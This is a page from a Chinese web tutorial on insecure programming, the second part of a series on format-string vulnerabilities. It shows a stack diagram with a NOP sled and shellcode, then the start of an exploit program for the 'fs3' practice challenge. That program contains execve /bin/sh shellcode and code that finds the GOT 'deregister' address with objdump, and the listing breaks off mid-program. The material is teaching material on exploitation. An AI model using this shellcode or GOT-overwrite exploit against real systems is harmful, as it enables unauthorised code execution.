WEB开发网
开发学院网络安全黑客技术 非安全编程演示之格式化字符串(2) 阅读

非安全编程演示之格式化字符串(2)

 2006-04-02 20:26:42 来源:WEB开发网   
核心提示: | ||-| <-0xb f f f f a d 7| shellcode ||-|| NOP || NOP || NOP | > 0xb f f f 95c0| NOP || NOP ||-|| deregister address ||-| <-0xb f f f 3


| |
|-------------------------| <-----0xb f f f f a d 7
| shellcode |
|-------------------------|
| NOP |
| NOP |
| NOP | > 0xb f f f 95c0
| NOP |
| NOP |
|-------------------------|
| deregister address |
|-------------------------| <-----0xb f f f 3a d7
| |


演示exploit:
/*
** exp_fs3.c
** Coded by Core Security - info@core-sec.com
*/


#include <string.h>
#include <stdio.h>
#include <unistd.h>


#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs3"
#define GREP "/bin/grep"


/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(void) {


char evil_buffer[49149 + 1], temp_buffer[64];
char *p;
int deregister_address;
FILE *f;


sprintf(temp_buffer, "%s -R %s | %s deregister", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%x", &deregister_address) != 1) {
pclose(f);
printf("Error: Cannot find deregister address in GOT!\n");
exit(1);
}


printf("deregister address is: 0x%x\n", deregister_address);

上一页  1 2 3 4 5 6 7 8  下一页

Tags:安全 编程 演示

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接